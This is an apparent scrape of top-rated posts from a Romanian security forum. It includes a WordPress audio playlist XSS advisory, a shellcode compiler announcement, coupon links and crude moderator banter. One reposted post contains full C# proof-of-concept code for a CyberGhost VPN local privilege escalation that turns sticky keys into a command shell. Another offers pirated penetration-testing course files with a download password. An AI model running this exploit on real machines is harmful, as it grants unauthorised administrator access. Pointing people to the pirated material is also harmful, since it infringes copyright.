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  1. Salut, am facut un program care posteaza singur in Grupurile de pe Facebook Sunt 3 fisiere : 1. grupuri.txt - aici pui link catre grupuri 2. text.txt - aici va fi textul de postat 3. config.txt - momentan aici se pot seta nr de secunde de asteptat intre postari Astept pareri si ce imbunatatiri sa-i adaug. Inca nu e gata, voi pune link de download cand este gata. Si cred ca o sa-l las pe consola momentan, fara interfata.
    2 points
  2. Ce oferi tu e sursa de penalizare 100%
    2 points
  3. Important Notice As of Mar 14, 2017 dmoz.org will no longer be available
    2 points
  4. Shellcode Compiler Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way. Shellcode Compiler takes as input a source file and it uses it's own compiler to interpret the code and generate an assembly file which is assembled with NASM (http://www.nasm.us/). Shellcode compiler was released at DefCamp security conference in Romania, November 2016. Link: https://github.com/NytroRST/ShellcodeCompiler
    1 point
  5. WordPress version 4.5.3 Audio Playlist suffers from a cross site scripting vulnerability. CODE: ------------------------------------------------------------------------ WordPress audio playlist functionality is affected by Cross-Site Scripting ------------------------------------------------------------------------ Yorick Koster, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Two Cross-Site Scripting vulnerabilities exists in the playlist functionality of WordPress. These issues can be exploited by convincing an Editor or Administrator into uploading a malicious MP3 file. Once uploaded the issues can be triggered by a Contributor or higher using the playlist shortcode. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160717-0003 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the WordPress version 4.5.3. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ These issues are resolved in WordPress version 4.7.3. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html It was discovered that meta information (ID3) stored in audio files are not properly sanitized in case they are uploaded by a user with the unfiltered_html (generally an Editor or Administrator). The first Cross-Site Scripting vulnerability exists in the function that processes the playlist shortcode, which is done in the wp_playlist_shortcode() method (/wp-includes/media.php). This method creates a <noscript> block for users with JavaScript disabled. The method wp_get_attachment_link() does not perform any output encoding on the link text. Meta information from the audio file is used in the link text, rendering wp_playlist_shortcode() vulnerable to Cross-Site Scripting. The second Cross-Site Scripting issue is DOM-based and exists in the JavaScript file /wp-includes/js/mediaelement/wp-playlist.js (or /wp-includes/js/mediaelement/wp-playlist.min.js). The WPPlaylistView object is used to render a audio player client side. The method renderTracks() uses the meta information from the audio file in a call to jQuery's append() method. No output encoding is used on the meta information, resulting in a Cross-Site Scripting vulnerability. Proof of concept The following MP3 file can be used to reproduce this issue: https://securify.nl/advisory/SFY20160742/xss.mp3 1) upload MP3 file to the Media Library (as Editor or Administrator). 2) Insert an Audio Playlist in a Post containing this MP3 (Create Audio Playlist). ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way. Sursa/Source: https://packetstormsecurity.com/files/141491/WordPress-4.5.3-Audio-Playlist-Cross-Site-Scripting.html
    1 point
  6. Chatty revine din concediu de boală. @wHoIS
    1 point
  7. https://www.udemy.com/hey-siri-whats-new-on-macos-sierra/?couponCode=UDEMYSTUD https://www.udemy.com/real-world-hacking-penetration-testing/?couponCode=HACKFREE https://www.udemy.com/youtubeforbusiness101/?couponCode=YOUTUBEMARKETINGTHKU https://www.udemy.com/boost-adsense-profits-on-existing-site-by-30/?couponCode=REVIEWCOPY10K https://www.udemy.com/try-angularjs/?couponCode=CFENOV2016 https://www.udemy.com/css-course/?couponCode=100_OFF https://www.udemy.com/learning-c-language/?couponCode=BBHFPROMO https://www.udemy.com/data-structure-and-algorithms-analysis/?couponCode=83476537845
    1 point
  8. # Exploit CyberGhost Privilege Escalation # Date: 06.03.2017 # Software Link: http://www.cyberghostvpn.com/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # Category: local 1. Description `CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want. https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html 2. Proof of Concept using System; using CyberGhost.Communication; namespace cyber { class Program { static void Main(string[] args) { Console.WriteLine("CyberGhost Privilege Escalation"); Console.WriteLine("by Kacper Szurek"); Console.WriteLine("http://security.szurek.pl/"); Console.WriteLine("https://twitter.com/KacperSzurek"); PeLauncherOptions options = new PeLauncherOptions(); options.ExecuteableName = "sethc.exe"; options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe"; EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe"); CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add); Console.WriteLine("Now logout and then press SHIFT key 5 times"); } } } Sursa/Source: https://packetstormsecurity.com/files/141455/CyberGhost-
    1 point
  9. Salut, 1. Am dat pana in anul 2038 ca nu suporta platforma mai mult 2. Am zis o saptamana, dar sa fie acolo grupa mare, in caz ca uit 3. Am intrat pe chat, am salutat si mi-ai dat mesaj privat cu formula clasica de salut romaneasca "muie" 4. Nu ne tragem de sireturi, nu suntem prieteni. Si daca am fi prieteni, intai ne-am saluta respectuos apoi ne-am baga pulile-n gura. Cat a trecut ? 1-2 zile ? Mai ai 5. Nu, nu e abuz. Esti in casa la noi.
    1 point
  10. Offensive.Security.CTP.v1.0 [2008] Offensive.Security.PWB.v.2.0 [Lab ex, 2007, bt2] Offensive.Security.PWB.v2.2 [Lab guide,2009, bt3] Offensive.Security.PWB.v3.0 [Lab guide,2010, bt4] Offensive.Security.Security.101 [Lab ex , 2007,bt2] Offensive.Security.WiFu.v2.0 [introduction to practical wireless attacks, 2009] Offsec-sample-report [sample penetration test report,v1.7,2008] CTP=Cracking the Perimeter PWB=Penetration testing With Backtrack download:Download 6f6666736563203a20637470207077622077696675.rar for free on Filesonic.com pass:6f6666736563203a20637470207077622077696675 sursa
    -1 points
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